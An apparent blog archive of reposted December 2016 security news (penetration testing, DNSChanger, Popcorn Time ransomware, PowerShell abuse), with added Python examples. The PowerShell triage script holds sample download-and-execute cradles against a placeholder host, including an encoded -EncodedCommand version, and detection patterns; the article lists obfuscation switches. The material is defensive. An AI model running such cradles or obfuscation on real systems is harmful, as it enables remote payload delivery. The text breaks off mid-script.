Monthly Archives: December 2016

Penetration Testing Not Vulnerability Assessment – Compliance Impact

Multiple regulatory compliance requirements have recently changed to require penetration testing of an organization's environment. With this added requirement comes added complexity and, typically, added confusion to the project. Most of the confusion is a direct result of organizations being uninformed about the differences between penetration testing and vulnerability scanning/assessments.


For the record, a vulnerability scan (or vulnerability assessment) looks for known vulnerabilities in a system and reports potential exposures. A penetration test is designed to actually exploit weaknesses in the system architecture or computing environment. Knowing the difference between these two exercises before engaging a security vendor is important, and that knowledge helps limit the surprises that may surface as a result.


Many companies market and advertise penetration testing capabilities, but potential customers of these vendors would be smart to research their methodologies before entering into any agreement. For example, the Payment Card Industry Security Standards Council (PCI SSC) now requires, as part of PCI DSS version 3.0, that penetration testers follow an “industry-proven methodology” such as NIST SP 800-115 or the Open Web Application Security Project (OWASP). This can only be a reaction to the market being flooded with vendors marketing penetration testing services yet providing only a “glorified” vulnerability assessment.

Identifying Penetration Testing and Vulnerability Scanning

Aside from the definitions provided in our opening paragraph, there are major differences that should be identified and agreed upon between any organization and potential security vendor.

  • Period of Performance: As a general rule of thumb, vulnerability scanning should be a continual exercise and conducted at least quarterly and/or as new equipment is introduced into the environment.  Conversely, penetration testing should be conducted less frequently (once per year) regardless of changes in the environment.
  • Reporting Capability/Results: Penetration testing reports are generally short explanations of what information was captured during the testing, while vulnerability reports are detailed baselines of vulnerabilities.  In addition, vulnerability assessment reports should be collected as they occur to ensure gaps are identified and mitigated.
  • Compliance Requirements: Both are required by PCI DSS, GLBA, and FFIEC regulations.
  • Work Requirements: Typically a vulnerability assessment can be performed by in-house staff or outside vendors, while “true” penetration testing should be provided by a third-party.
  • Overall Purpose: Probably the most commonly confused, and arguably the most important, aspect of the two is their purpose or intent. Penetration tests are utilized to demonstrate various exploits and as a tool to reduce exposure. Vulnerability scanning is used for detection purposes and demonstrates when devices could be compromised.

Conclusions: Penetration Testing, Vulnerability Assessment, Compliance

It’s simple to see that both a vulnerability assessment and penetration test could be used to improve the overall security posture of an organization, but identifying the differences is important in setting result expectations.  Asking simple questions about the process/methodology utilized, and the expected results of reporting can have a profound impact on your selection of a proven security vendor.


via:  praetoriansecure

Nintendo will pay you up to $20,000 to hack the 3DS

So you bought a Nintendo 3DS to play some Pokemon Sun… but now your Pokedex is complete and you’ve explored every inch of Alola. Now what?


If you’ve got a technical background, you might consider poking around the 3DS itself. There might just be a big ol’ stack of cash in it for you.


Nintendo has just launched a bug bounty program by way of HackerOne. Find a bug that can make a 3DS do certain things it’s not supposed to and Nintendo will cough up anywhere from 100 bucks to $20,000.


Nintendo is being pretty open with the sorts of things they’re looking to eliminate here. To quote them directly:

Below are examples of types of activities that Nintendo is focused on preventing:

Piracy, including:
– Game application dumping
– Copied game application execution

Cheating, including:
– Game application modification
– Save data modification

Dissemination of inappropriate content to children

As with most bug bounty programs, there are a few catches: the payout is up to Nintendo, you’ve got to be the first person to tell them about the bug (publicly or privately) and you’ve got to agree not to ever tell anyone else about the bug.


That last one in particular might trip up some people — many a researcher loves to detail their bug hunt to the public once a company has had a chance to fix it. Alas, as Nintendo can’t necessarily patch all bugs out of existence on all consoles (many of which never connect to the internet), they’re trying to keep a tight lid on things.


I get the sense that this is something of a dry run for Nintendo — an experiment to see how something like this might work on the Nintendo Switch. As an example: Preventing piracy on the 3DS is listed as one of the main goals, but that ship set sail long ago. They might find some new exploits they hadn’t seen before through this program, but that doesn’t help all of the ones that have come to light since the 3DS started shipping back in 2011.


via:  techcrunch

Lessons learned from the 7 major cyber security incidents of 2016

What to glean from the DNC and Yahoo hacks, the rise of ransomware.

Cyber incidents dominated headlines this year, from Russia’s hacking of Democrat emails to internet cameras and DVRs launching DDoS attacks, leaving the impression among many that nothing should be entrusted to the internet.


These incidents reveal technical flaws that can be addressed and failure to employ best practices that might have prevented some of them from happening.


The most important lesson is that cybersecurity is a perpetual battle in which neither side gets the upper hand for long and that requires constant incident post-mortems to discover the next measures to keep data and communications safe.


Here is a look at seven such incidents and what lessons they afford.

DNC hack

The theft of emails from the Democratic National Committee not only revealed information that turned many away from Democratic presidential candidate Hillary Clinton, it also showed that Russia was trying to influence the election in favor of Republican Donald Trump.

U.S. intelligence services say the hack was likely the work of Russian hackers with possible ties to top Kremlin officials, although the opinion is not unanimous. Trump disputes even that Russia was involved at all. President Barack Obama has called for a report on the incident before he leaves office next month, but it’s likely the true nature and impact of the breach won’t be known for long after that, if ever.

The case points up the general difficulty of attributing attacks to particular actors with incontrovertible evidence. Researchers at security vendors have attributed this compromise to Russian groups Cozy Bear and Fancy Bear based on its tactics and methods, but that doesn’t link it conclusively to the Russian government.


What the incident does show is that politically motivated attacks can be effective and can be carried out without leaving a smoking gun.

The attack exposes the influence foreign states can have over any country’s elections. More narrowly, candidates and their parties need to pay more attention to better network security if they hope to avoid this type of attack in the future, regardless of who the perpetrator is.

Dyn DDoS attack

This massive DDoS attack against major DNS service Dyn had more spectacular results than the perpetrators likely hoped for.

It was noteworthy for enlisting tens of thousands of internet of things (IoT) devices into a botnet that carried out much of the attack. Three waves of traffic hit Dyn Oct. 21, focusing on different Dyn data centers.


The attack was made more potent because when Dyn’s servers became flooded, DNS requests went unanswered long enough that the requesting machines – legitimate ones and bots – sent follow-up requests, compounding the traffic flood.

Because Dyn served major customers – Amazon, Etsy, GitHub, Shopify, Twitter – addresses for traffic headed their way couldn’t be resolved. Because these victims are so high-profile, it seemed to some that the internet was broken.

The lesson for enterprises is to double or triple up on DNS providers so that if one goes down, there is a backup. They should also look at lowering the time-to-live (TTL) settings on their DNS servers so that when attacks like this do occur, they can redirect traffic to the backup DNS providers faster.
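The two lessons above, provider redundancy and short TTLs, can be checked mechanically against a zone. The following is an added example, not code from the article or from Dyn: it parses constructed BIND-style zone fragments, groups the NS records by provider, and flags any record whose TTL would slow a switch to the backup provider. The 300-second ceiling and the rule that the last two labels of an NS hostname identify its provider are assumptions made for illustration.

```python
"""Audit a zone's NS delegation for single-provider dependence and slow failover.

Added example for the Dyn lesson above, not code from the article. The zone
fragments are constructed; the provider grouping assumes the last two labels
of an NS hostname identify the provider; the 300-second TTL ceiling is an
assumed policy value.
"""
import re
from collections import defaultdict

# Constructed zone fragment (BIND presentation format): one provider, long TTLs.
RISKY_ZONE = """\
$TTL 86400
example.test.       86400 IN NS ns1.dns-provider-a.test.
example.test.       86400 IN NS ns2.dns-provider-a.test.
www.example.test.    3600 IN A  203.0.113.10
api.example.test.   86400 IN A  203.0.113.11
"""

# Constructed zone fragment: two independent providers, short TTLs.
RESILIENT_ZONE = """\
$TTL 300
example.test.       300 IN NS ns1.dns-provider-a.test.
example.test.       300 IN NS ns1.dns-provider-b.test.
www.example.test.   300 IN A  203.0.113.10
api.example.test.   300 IN A  203.0.113.11
"""

RECORD_RE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+(NS|A|AAAA|CNAME)\s+(\S+)$")


def parse_zone(text):
    """Return (name, ttl, type, rdata) tuples; skips directives and comments."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "$;":
            continue
        m = RECORD_RE.match(line)
        if m:
            name, ttl, rtype, rdata = m.groups()
            records.append((name, int(ttl), rtype, rdata))
    return records


def provider_of(ns_host):
    """Assumption: the registrable domain of the NS host names the provider."""
    return ".".join(ns_host.rstrip(".").split(".")[-2:])


def audit_zone(text, max_ttl=300):
    """List findings that would slow recovery if one DNS provider is knocked out."""
    records = parse_zone(text)
    findings = []
    providers = defaultdict(list)
    for _, _, rtype, rdata in records:
        if rtype == "NS":
            providers[provider_of(rdata)].append(rdata)
    if len(providers) < 2:
        findings.append("single DNS provider: " + ", ".join(sorted(providers)))
    for name, ttl, rtype, _ in records:
        if ttl > max_ttl:
            findings.append(f"{name} {rtype} TTL {ttl}s exceeds {max_ttl}s")
    return findings


if __name__ == "__main__":
    for label, zone in (("risky", RISKY_ZONE), ("resilient", RESILIENT_ZONE)):
        print(label, audit_zone(zone) or ["no findings"])
```

Resolvers also cache the delegation NS records that the parent zone publishes through the registrar, so a check of your own zone file is one half of the picture; the registrar-side delegation must list the backup provider too.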

Panama Papers

Thieves stole 2.6 TB of data from the Panamanian law firm Mossack Fonseca, making this a major breach based on the volume of stolen information alone. Add to the mix that the data included details about how 70 past and current world political figures hid income from revenue officials in offshore accounts and the importance is even bigger.

The prime minister of Iceland was forced to step down due to the scandal, while officials in the U.K., France, Austria, South Korea and Pakistan faced public outcry.


The culprit is unknown, but researchers probing the law firm’s network found multiple applications and plugins that weren’t kept up to date and contained vulnerabilities. Network architects didn’t employ least privilege for administrators, so hacking just one set of credentials would expose more systems than it might have if admins had access to the minimum number of systems needed to do their jobs.

Yahoo hack

When Yahoo announced Sept. 22 that half a billion of its accounts had been hacked, it was the largest ever hack of its kind. Then it came out that the actual compromise happened in 2014, elevating the incident into the realm of the incredible.

Beyond the uncountable effects of that many accounts being vulnerable for that long, the breach threw the $4.8 billion sale of Yahoo to Verizon into turmoil. It still hasn’t gone through, with speculation being that Verizon wants to trim $1 billion from the price because the hack affects Yahoo’s value.

The entire fiasco holds lessons for consumers: use strong, unique passwords for all accounts and change them regularly.

It also is an object lesson for businesses and other entities that might some day have to explain a breach – get out in front of the problem and be open with facts about how it happened and what’s being done to fix it. Also – and this is difficult to specify – they should employ detection platforms that expose such breaches more quickly.

NSA Shadow Brokers leak

Shadow Brokers, a hacking group of uncertain membership, tried to sell what it described as hacking tools stolen from an equally mysterious organization called Equation Group.

The importance is that Equation Group may have links to the NSA and Shadow Brokers may have links to Russia. One theory goes that Russia exposed the alleged NSA tools as a way to embarrass the NSA and weaken whatever response the U.S. might initiate against Russia for its alleged hack of the Democratic National Committee.

The advertised sale of the tools may have been a ploy to give the story wider attention and so a greater impact against the NSA.

It turns out the tools, which work against specific devices made by specific vendors, were years old, and they may have been lifted from a single NSA server on which careless operatives had left them.

The importance is that it seems a Russian group hacked an NSA server to capture cyber spy tools.

$65 million bitcoin hack

Bitfinex, the bitcoin trading platform, was hacked for nearly 120,000 bitcoin Aug. 2, an attack that undermined the company’s three-tiered and purportedly impregnable key-exchange architecture.

The hack was the third largest bitcoin heist, but Bitfinex is the largest platform for converting bitcoin to U.S. dollars so it resonated widely. Bitfinex spread the loss across all its customers’ accounts – 36% of each account’s value.

Beyond that, the exchange was using a complex authentication scheme that required two factors, one held by Bitfinex and one by its security partner BitGo. It was supposed to be highly secure. Compromising both companies would be required if thieves wanted to steal funds, the company said when it set up the scheme. BitGo says its system wasn’t compromised.

The lesson is that even the most sophisticated bitcoin exchanges are still susceptible to hacks and individuals and organizations using them should take steps to minimize their exposure.

Ransomware v. healthcare

Dozens of ransomware incidents this year were carried out against health care institutions, revealing how easy and lucrative ransomware has become as a business as well as how low criminals will stoop when choosing victims.

Many healthcare providers who were hit didn’t have backups or other means to recover quickly from the attacks and so they paid the ransom. More than one that paid was hit again by the same actor coming back for a second bite of the apple.

These incidents are likely to continue as long as it’s relatively simple to infect a victim and extort payment. Ransomware as a service is cropping up in the internet underworld, making it a threat to consumers as well as giant corporations.

The prevalence of these attacks should serve as warning that businesses in any field should have reliable, secure backups that can recover machines that have been encrypted by ransomware. And they should have systems that detect these infections early so they can be isolated to minimize the damage they do.


via:  networkworld

Microsoft adds Skype translation to landline calls

With little fanfare, a significant change to Skype translation goes live.

One would think the addition of a feature like this would have Microsoft screaming from the rooftops, but very quietly Microsoft added a new feature to Skype that supports its real-time translation technology in calls to landlines and mobile phones.

The new feature was added to its preview build of the Skype Windows Store app late last week. The new version of Skype Preview can now perform real-time spoken-word translations via Skype Translator when calling landlines and mobile phones, and the person on the other end does not need Skype on their phone to receive translations or be translated.

Of course, it’s not for everyone. To use this new version of Skype Preview, you need to be running the latest build of Windows 10 Insider Preview from the fast ring. That tends to be reserved for dedicated testers and developers, since fast ring releases aren’t as stable as normal builds and are geared for debugging.

Should you be running Build 14986, just download and install the latest version of Skype Preview from the store. If you already have Skype Preview installed, then all you need to do is check for updates.

Plus, you need some Skype credits or a calling subscription, since calls to landlines and mobile phones are not free. Good news if you are an Office 365 Home or Personal subscriber, as you get 60 minutes of free Skype calling minutes every month.

PC-free communication

It may still be in the early stages, but this advance is significant and cannot be overstated. Instead of requiring both parties to be at a PC with a headset and Skype, one can be completely free of the PC. Think of the benefits to emerging countries where computing is not as widely available and they still use landlines. Or think of its potential uses for people in the field, far from a power plug but with a smartphone.

Either way, this enables translation technology to many more corners of the world. As more languages are added, it will only enable more global communication. Skype currently supports nine spoken languages: Arabic, Brazilian Portuguese, English, French, German, Italian, Mandarin, Spanish and Russian.

There is no release date for this version of Skype. Don’t hold your breath for it, as the fast ring builds are for Redstone 2, aka the Creators Update, which is tentatively scheduled for next spring (April/May). And no one has really been able to put Skype Update through its paces to see how well it works, so the app itself likely needs more work.


via:  networkworld

DNSChanger Malware is Back! Hijacking Routers to Target Every Connected Device

Next time you see an advertisement for your favorite pair of shoes on any website, even a legitimate one, just DO NOT CLICK ON IT.

…Because that advertisement could infect you in such a way that not just your system, but every device connected to your network, would be affected.

A few days ago, we reported about a new exploit kit, dubbed Stegano, that hides malicious code in the pixels of banner advertisements rotating on several high profile news websites.

Now, researchers have discovered that attackers are targeting online users with an exploit kit called DNSChanger that is being distributed via advertisements that hide malicious code in image data.

Remember DNSChanger? Yes, the same malware that infected millions of computers across the world in 2012.


DNSChanger works by changing DNS server entries in infected computers to point to malicious servers under the control of the attackers, rather than the DNS servers provided by any ISP or organization.

So whenever a user of an infected system looked up a website on the Internet, the malicious DNS server could send them instead to, say, a phishing site. Attackers could also inject ads, redirect search results, or attempt to install drive-by downloads.

The most worrisome part is that hackers have combined both threats in their recent widespread malvertising campaign: DNSChanger malware is being spread using the Stegano technique, and once it reaches your system, instead of infecting your PC it takes control of your unsecured router.

Researchers at Proofpoint have discovered this unique DNSChanger exploit kit on more than 166 router models. The kit is unique because the malware in it does not target browsers, rather it targets routers that run unpatched firmware or are secured with weak admin passwords.

Here’s How the Attack Works:

Firstly, the ads on mainstream websites hiding malicious code in image data redirect victims to web pages hosting the DNSChanger exploit kit. The exploit kit then targets unsecured routers.

Once the router is compromised, the DNSChanger malware configures itself to use an attacker-controlled DNS server, causing most computers and devices on the network to visit malicious servers, rather than those corresponding to their official domain.


Those ads containing malicious JavaScript code reveal a user’s local IP address by triggering a WebRTC request (the web communication protocol) to a Mozilla STUN (Session Traversal Utilities for NAT) server.

The STUN server then sends a reply back containing the IP address and port of the client. If the target’s IP address is within a targeted range, the target receives a fake ad hiding exploit code in the metadata of a PNG image.

The malicious code eventually redirects the visitor to a web page hosting DNSChanger, which uses the Chrome browser for Windows and Android to serve a second image concealed with the router exploit code.

“This attack is determined by the particular router model that is detected during the reconnaissance phase,” a Proofpoint researcher wrote in a blog post. “If there is no known exploit, the attack will attempt to use default credentials.”

List of Routers Affected
The attack then cloaks traffic and compares the accessed router against 166 fingerprints used to determine if a target is using a vulnerable router model. According to researchers, some of the vulnerable routers include:

  • D-Link DSL-2740R
  • NetGear WNDR3400v3 (and likely other models in this series)
  • Netgear R6200
  • COMTREND ADSL Router CT-5367 C01_R12
  • Pirelli ADSL2/2+ Wireless Router P.DGA4001N

It is not clear at the moment how many people have been exposed to the malicious ads or how long the campaign has been running, but Proofpoint said the attackers behind the campaign have previously been responsible for infecting more than 1 million people a day.

Proofpoint did not disclose the name of any ad network or website displaying the malicious advertisements.

Users are advised to ensure that their routers are running the latest version of the firmware and are protected with a strong password. They can also disable remote administration, change its default local IP address, and hardcode a trusted DNS server into the operating system network settings.
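The last piece of advice above, hardcoding a trusted DNS server, is only useful if you also verify what the operating system and the router are actually using. The following is an added example, not code from the article or from Proofpoint: it reads resolver addresses from resolv.conf-style text (a constructed sample), classifies each against a constructed trust policy, and applies the same check to the upstream DNS list copied from a router's admin page. The sample addresses, the trusted set and the labels are all assumptions made for illustration.

```python
"""Check that a host's configured DNS resolvers are ones you trust.

Added example for the DNSChanger advice above; not code from the article or
from Proofpoint. The resolv.conf-style sample, the router upstream list and
the trusted-resolver set are all constructed values.
"""
import ipaddress

# RFC 1918 and loopback ranges: a resolver here is "local" (typically the router).
LAN_NETWORKS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Constructed: what a DHCP-configured client shows after its router was changed.
SAMPLE_RESOLV_CONF = """\
# Generated by the DHCP client (constructed sample)
search home.test
nameserver 192.168.1.1
nameserver 198.51.100.77
"""

# Constructed: the upstream DNS servers read from the router's admin page.
SAMPLE_ROUTER_UPSTREAM = ["198.51.100.77", "198.51.100.78"]

# Constructed policy: the LAN gateway plus the resolver the organisation hardcodes.
TRUSTED_RESOLVERS = {"192.168.1.1", "203.0.113.53"}


def parse_nameservers(text):
    """Extract 'nameserver' addresses from resolv.conf-style text, in order."""
    return [parts[1] for parts in (line.split() for line in text.splitlines())
            if len(parts) >= 2 and parts[0] == "nameserver"]


def is_lan_address(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in LAN_NETWORKS)


def classify_resolver(addr, trusted=TRUSTED_RESOLVERS):
    """Label one resolver address against the trust policy."""
    if addr in trusted:
        # A trusted LAN gateway only forwards; its own upstream must be checked too.
        return "trusted-gateway" if is_lan_address(addr) else "trusted"
    return "untrusted-local" if is_lan_address(addr) else "untrusted-public"


def audit_resolvers(addresses, trusted=TRUSTED_RESOLVERS):
    return [(a, classify_resolver(a, trusted)) for a in addresses]


def hijack_suspected(addresses, trusted=TRUSTED_RESOLVERS):
    """True if any resolver in the list falls outside the trust policy."""
    return any(label.startswith("untrusted")
               for _, label in audit_resolvers(addresses, trusted))


if __name__ == "__main__":
    host = parse_nameservers(SAMPLE_RESOLV_CONF)
    print("host resolvers:", audit_resolvers(host), "suspect:", hijack_suspected(host))
    print("router upstream:", audit_resolvers(SAMPLE_ROUTER_UPSTREAM),
          "suspect:", hijack_suspected(SAMPLE_ROUTER_UPSTREAM))
```

A host that only lists its router as resolver will look clean from the host's side even when the router's upstream DNS has been changed, which is exactly the case the article describes; that is why the same check is run against the router's own upstream list, and why a hardcoded public resolver on the host is the setting that survives a router compromise.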


via:  thehackernews

10 ways to beef up Digital Security

#1. Keep everything up to date. You know those annoying popups telling you updates are available? Do you ever click out of them? Don't. Always update at the time these appear.

#2. Two-step verification. Two-step verification or authentication should be set up for all your accounts that offer it. A unique one-time code is sent to the user's phone or via e-mail that must be entered in the login field.

#3. Unneeded browser extensions? Review your browser extensions. Uninstall the ones you don't use. Too many extensions can slow down your computer.

#4. Encryption. Encryption software will scramble your e-mail and other correspondence so that prying eyes can't read them, but you and your intended correspondent can. If you must use public Wi-Fi (like at a coffee house), install a virtual private network to encrypt transactions.

#5. Lock screen protection for your mobile device. Your smartphone has lock screen protection in the form of a password to prevent a non-authorized user from gaining access. If you leave your phone lying around or lose it, you're protected if you have a password. Otherwise you are screwed.
In the same vein, your laptop should have protection from non-authorized users. Set up a password that allows access to using the device, including after hibernation periods.

#6. Check active logins. Some accounts allow you to check active logins to see if any unauthorized users have been in your accounts, such as Twitter, Facebook and Gmail.

#7. How easily can someone impersonate you? Could anyone phone your bank or medical carrier and give the correct information to bypass security, such as your favorite pet's name? Who might know this information? Well, if it's on your Facebook page, anyone who can view it. How much of your personal information is actually online? Many accounts allow a secondary password; ask them.

#8. Simple but powerful layers of protection.
Don't have login information written down on hard copy.
Cover your webcam with tape (yes, cybercrooks have been known to spy on people this way).

#9. Sharing your personal life with the whole world. Set all of your social media accounts to the private settings you desire. Do you really want a potential employer to see you hurling at your late-night party? Make sure images that you post are not geo-tagged with your home address.

#10. Web tools. Check out the various toolbars that you can add to your browser to beef up security. Be selective and check ratings.


See him knock 'em dead in this identity theft prevention video.

via: robertsiciliano

New ransomware lets you decrypt your files — by infecting other users

The ransomware will lock your files, unless you pay up. But it also contains a far more sinister method of decrypting your files.


A new kind of ransomware comes with its own “referrals” program, one that you probably wouldn’t want to join.

The malware dubbed “Popcorn Time” locks your Windows computer’s files with strong AES-256 encryption until you pay a ransom of one bitcoin (or $780 at the time of writing).


(Image: MalwareHunterTeam)


But this ransomware comes with a twist.

The lock screen will let victims unlock their files the “nasty way” by sharing a link with two other people — presumably ones the victim doesn’t like. If they become infected and pay, then the original victim will receive a free decryption key.

Otherwise, infected users have seven days to pay the bitcoin ransom to an anonymous wallet.

According to one report, the ever-evolving source code suggests that if a victim enters the decryption code incorrectly more than a handful of times, the ransomware will permanently lock the files.

The ransomware just this week was updated to encrypt files in Documents, Pictures, Music and Desktop folders, as well as dozens of file extensions, including many of the most popular.

A series of screenshots tweeted by the MalwareHunterTeam, which found the ransomware, shows that the criminals purport to be Syrian, and that the money paid “will be used for food, medicine, and shelter to those in need.”


“We are extremely sorry that we are forcing you to pay but that’s the only way that we can keep living,” said the ransomware note.


(Image: MalwareHunterTeam)


(Image: Screenshot by MalwareHunter)


via:  zdnet

Why Physical Security Should Be as Important as Cybersecurity

Here are five tips to help small businesses increase physical security measures and protect their technology investments and data.

Many businesses spend vast amounts of time and money — and rightly so — focused on firewalls and encryption software to protect their IT systems and data. However, physical security is often overlooked in the debate over cybersecurity. It can be just as crucial, though, especially for small businesses that do not have as many resources as larger firms to devote to security personnel and tools.

Physical security helps companies protect assets, including IT infrastructure and servers, that make their businesses run and that store sensitive and critical data. Physical security encompasses measures and tools like gates, alarms and video surveillance cameras, but also includes another central element: an organization’s personnel. Crucially, business and IT leaders need to foster a culture of security in addition to investing in technology to protect the organization, according to security experts.

The Department of Homeland Security and the National Cyber Security Alliance (NCSA), a public-private partnership, have for the past 13 years been using October to annually mark National Cyber Security Awareness Month. The second week is focused on what organizations can do to create a culture of cybersecurity in the workplace.

Here are some strategies small businesses can follow to enhance physical security and make sure their data and IT infrastructure remains secure.

Instill a Culture of Security

An organization’s employees are its first line of defense, according to Malcolm Harkins, a security industry veteran and chief security and trust officer at Cylance, a cybersecurity firm focused on proactive defense.

Harkins says that companies should start improving their security “by building security awareness and instilling a culture of commitment by creating a great place to work.”

“If you do this, your employees are less likely to get disgruntled and will, in turn, not want to harm the company,” he wrote in an op-ed piece for CBS Boston. “Train employees on security awareness, such as locking and encrypting their systems, choosing safe passwords and only sharing confidential information with those who need to know.”

Invest in Security Gates and Doors

In addition to having a staff member in a building’s lobby monitoring who gets access to a company’s offices, security technology expert Robert Covington, the founder and president of togoCIO, writes in Computerworld that “systems requiring a proximity card for entry are now quite common, and with good reason.”

Such systems are important and should be used more than they are, he says, because they “provide tight granularity of access control for individual doors and a detailed audit trail.”

Yet, as Covington notes, badges or badge data can be stolen by thieves or malicious actors. Ralph Goldman, a security industry veteran and lead writer for the Lock Blog, tells CIO that wireless communication technology is now enabling businesses to deploy “smart locks” that can let firms add barriers to doors and unlock the doors remotely via wireless protocols.

Monitor Your Systems and Space

Covington notes that video surveillance cameras “are very inexpensive today, and yet they can do double duty, not only detecting possible threats in progress, but allowing for forensic review of incidents. What a bargain!”

Surprisingly, he says, few companies use them — and many that do ignore them. “Cameras should be installed at all entry points to a facility, and in key areas such as data centers and telecom closets,” he says. “The video should be recorded and retained, with a live monitor placed on the desk of someone who can keep an eye on it.”

Getting Alerts with Alarms

Beyond all of these measures, intrusion detection systems and alarms are also key elements of physical security. “Monitored alarms will help to drive away intruders – and ensure that staff or the police will be on their way if the alarm persists,” notes. “Consult a registered alarm specialist to find, install and maintain the ideal system for you.”

Covington notes that many small offices often share a common wall with other tenants in multitenant buildings. “You don’t have to watch many home improvement shows to realize just how easy it is to get through drywall,” he says. “You need an intrusion system, and you need one supporting unique codes for each individual for audit trail purposes.”

Focus on the Server Room

For many small businesses, their data center is a server or rack of servers in a closet or small room. Guarding and monitoring access to that physical space is essential to maintaining data security — and potentially the operations of the business if the servers are tampered with or destroyed.

“Security gates can be installed in a doorway in order to prevent access to the server room. These gates are easy to use and can be opened completely, providing unrestricted access to the room when needed,” notes Quantum Security Gates, a security gate vendor. “However, their strong construction and secure locks keep intruders out when they are locked.”

Physical security gates can also provide ventilation to server rooms — an advantage over a locked door. Gates can also be installed behind a locked door, Quantum notes.

“Some companies do not consider securing their server rooms due to cost concerns. This is not a smart strategy,” reports Quantum. “While installing security gates does come with a cost, this cost pales in comparison to the tremendous cost that could occur if the server room is broken into. Also, the potential hassles of replacing the information, programs and down time to operate your business.”

Quantum notes that some employees may not have the security clearance required to access the server room. In addition to workers, there are often visitors, clients and other people walking through offices.

“Protecting your server room from these people is important,” the firm adds. “It’s also important to remember that, in many office break-ins, criminals look for electronics and confidential information first. Therefore, it’s a good idea to not label your server room as such and, of course, to ensure that it’s protected by physical security gates.”


via:  biztechmagazine

PowerShell security threats greater than ever, researchers warn

Administrators should upgrade to the latest version of Microsoft PowerShell and enable extended logging and monitoring capabilities in the light of a surge in related security threats, warn researchers.

Microsoft’s Windows PowerShell configuration management framework continues to be abused by cyber attackers, according to researchers, who have seen a surge in associated threats.

In March 2016, security experts warned that PowerShell had been fully weaponised. In the following month, a report confirmed that PowerShell was used to launch 38% of cyber attacks seen by security firm Carbon Black and its partners in 2015.

Now more than 95% of PowerShell scripts analysed by Symantec researchers have been found to be malicious, with 111 threat families using PowerShell.

Malicious PowerShell scripts are on the rise, as attackers are using the framework’s flexibility to download their payloads, traverse through a compromised network and carry out reconnaissance, according to Candid Wueest, threat researcher at Symantec.

“This shows that externally sourced PowerShell scripts are a major threat to enterprises,” he wrote in a blog post.

The researchers also found that many targeted attack groups use PowerShell in their attack chain because it provides easy access to all major functions of the Microsoft Windows operating system.

PowerShell is also attractive to attackers because it is installed by default on computers running Windows and leaves few traces for analysis: the framework can execute payloads directly from memory, so a malicious script need never be written to disk where file-based scanning or forensics would find it.

Abuse of PowerShell is often made easier because most organisations do not enable monitoring and extended logging (such as script block and module logging) on their computers, so the commands attackers run are never recorded and PowerShell threats are harder to detect.

While many system administrators use PowerShell scripts for daily management tasks, researchers have seen attackers increasingly using the framework for their campaigns.

Many recent targeted attacks have used PowerShell scripts, according to Symantec. “The Odinaff group used malicious PowerShell scripts when it attacked financial organisations worldwide,” said Wueest.

“Common cyber criminals are leveraging PowerShell as well, such as the attackers behind Trojan.Kotver, who use the scripting language to create a fileless infection completely contained in the registry,” he said.

Malicious PowerShell scripts are mainly used as downloaders, said Wueest, typically launched from an Office macro or a JavaScript attachment, and during the lateral movement phase, where a threat executes code on a remote computer when spreading inside the network.

The most prevalent malware families that currently use PowerShell are W97M.Downloader, Trojan.Kotver and JS.Downloader.

Over the past six months, Symantec said it has blocked an average of 466,028 emails with malicious JavaScript per day.

“Not all malicious JavaScript files use PowerShell to download files, but we have seen a steady increase in the framework’s usage,” said Wueest.

“Some of the newest downloader attacks using PowerShell work through multiple stages, where the attached script downloads another script, which in turn downloads the payload. Attackers use this convoluted infection method in an attempt to bypass security protections,” he said.

Apart from downloading payloads, malicious PowerShell scripts have been used to perform various tasks, such as uninstalling security products, detecting sandboxed environments or sniffing the network for passwords.

The flexibility of the PowerShell language allows scripts to be obfuscated in multiple ways, the researchers have found: abbreviated parameter names and aliases (for example -nop, -w hidden, iex), backtick escape characters inserted inside cmdlet names, or Base64-encoded commands passed via -EncodedCommand, each of which defeats naive string matching on the command line.
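The two points above, that most organisations never log what PowerShell runs and that attackers hide download cradles behind abbreviated switches, backtick escapes and -EncodedCommand, come together in triage. The following is an added example (not code from the original article or from Symantec) of the kind of check a defender would run over process-creation records once command-line auditing is on. It decodes -EncodedCommand payloads (Base64 over UTF-16LE), strips backtick obfuscation, and scores each command line against the indicators the article describes. The sample command lines, the example.invalid URLs, the indicator weights and the threshold are all constructed assumptions for illustration, not Symantec's detection logic.

```python
"""Triage PowerShell command lines from process-creation logs.

Added example, not code from the original article or from Symantec. It
decodes -EncodedCommand payloads (Base64 over UTF-16LE), strips backtick
escape-character obfuscation, and scores each command line against the
indicators the article describes: download cradles, Invoke-Expression,
hidden windows and execution-policy bypass. The sample command lines, the
example.invalid URLs and the scoring weights/threshold are all constructed
for illustration.
"""
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand, plus -ec.
_ENCODED_SWITCHES = {"encodedcommand"[:i] for i in range(1, 15)} | {"ec"}
# A switch followed by a Base64-looking token, e.g. "-enc SQBFAFgA...".
_SWITCH_RE = re.compile(r"(?<!\S)-([A-Za-z]+)\s+([A-Za-z0-9+/=]+)")

# Indicator name -> (pattern matched against the normalised text, weight).
_INDICATORS = {
    "download_cradle": (re.compile(
        r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|"
        r"\biwr\b|invoke-restmethod|\birm\b|bitstransfer"), 3),
    "invoke_expression": (re.compile(r"\biex\b|invoke-expression"), 2),
    "hidden_window": (re.compile(r"-w[a-z]*\s+hidden"), 2),
    "execpolicy_bypass": (re.compile(r"-e(?:p|x[a-z]*)\s+(?:bypass|unrestricted)"), 2),
    "no_profile": (re.compile(r"-nop(?:rofile)?\b"), 1),
}
SUSPICIOUS_THRESHOLD = 4  # assumed cut-off; tune against your own baseline

# Constructed sample payload, encoded the way -EncodedCommand expects it.
_SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/c.ps1')"
SAMPLE_ENCODED = base64.b64encode(_SAMPLE_PAYLOAD.encode("utf-16le")).decode("ascii")

# Constructed command lines as they would appear in Security event 4688 or Sysmon event 1.
SAMPLE_COMMAND_LINES = [
    # benign scheduled-task style usage
    r"powershell.exe -NoProfile -File C:\ops\rotate-logs.ps1",
    # classic download cradle with abbreviated switches
    'powershell.exe -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient)'
    ".DownloadString('http://example.invalid/a.ps1')\"",
    # the same cradle hidden behind -EncodedCommand
    "powershell.exe -NoP -W Hidden -Enc " + SAMPLE_ENCODED,
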